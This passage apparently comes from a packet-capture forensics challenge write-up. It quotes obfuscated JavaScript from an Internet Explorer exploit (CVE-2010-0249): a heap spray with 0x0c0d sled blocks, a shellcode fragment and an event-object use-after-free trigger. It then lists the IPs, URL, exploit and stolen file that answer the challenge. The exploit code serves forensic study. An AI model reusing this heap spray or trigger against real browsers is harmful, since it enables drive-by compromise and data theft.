e81c%u088e%u3f61%u8ef7%u3593%u531b');
  var bin0C0D = funcUnescape( "%" + "u" + "0" + "c" + "0" + "d" + "%u" + "0" + "c" + "0" + "d" );
  do {
    bin0C0D += bin0C0D
  } while( bin0C0D.length < 0xd0000 );
  for ( i = 0 ; i < 150 ; i++ )
    array2[i] = bin0C0D + EURI;
}

function MAKCshNm(XSRhYfMvBfFbxlDiyjBApKkHjpVhRqfzKCPKCNH){
  func1();
  eventObject = document.createEventObject(XSRhYfMvBfFbxlDiyjBApKkHjpVhRqfzKCPKCNH);
  document.getElementById("ILqhSVYCTPuMXyuIkXNJGtSiZFetXbaxyjQmTKbbjPjxVQlXPxLNTowWKpuHwMCPpOqCIpSJqRdMnpEMoWsZhNapeUmCrvMplm").innerHTML = "";
  window.setInterval(lkYYAsjOgRVzdPyazxKCcyPFS, 50);
}

function func2(){
  p = "\u0c0f\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d\u0c0d";
  for (i = 0; i < array1.length; i++){
    array1[i].data = p;
  }
  var t = eventObject.srcElement;
}

That is roughly what it does.

Summary

To try this challenge on your own, download the packet capture, study it, and try to answer the following questions:
Which IP addresses were involved?
  192.168.1.5
  192.168.1.50
What URL(s) was (were) requested?
  http://192.168.1.5/zezevAs9up49EdRema/
What exploit was used?
  CVE-2010-0249
What information was taken?
  c:\windows\temp\T0ps3(r3t.txt

Addendum

> file T0ps3(r3t.txt
T0ps3(r3t.txt; data

@ucq About T0ps3(r3t.txt: at a glance the entropy looks high. There are no 0x00 bytes. The file size is not a round figure, so it does not look like a modern cipher. 2*83*167. Since it is 166*167, that looks kind of promising.

Bitmap image of T0ps3(r3t.txt (27,722 bytes)

Bitmap image of the pcap file

*1: Looking at the VirusTotal results, CVE-2010-0247 also shows up.